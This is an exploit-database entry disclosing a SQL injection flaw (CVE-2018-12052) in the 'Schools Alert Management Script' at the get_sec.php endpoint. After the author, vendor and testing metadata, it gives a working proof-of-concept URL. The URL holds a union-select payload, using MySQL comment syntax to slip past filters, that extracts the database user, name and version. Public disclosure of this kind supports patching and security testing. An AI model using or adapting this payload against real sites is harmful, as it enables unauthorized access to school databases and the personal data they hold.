Schools Alert Management Script - 'get_sec.php' SQL Injection



EKU-ID: 48800 CVE: CVE-2018-12052 OSVDB-ID:
Author: M3@Pandas Published: 2018-06-11 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/3
# Tested on: Linux Mint
# CVE: CVE-2018-12052

# Proof of Concept:

/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23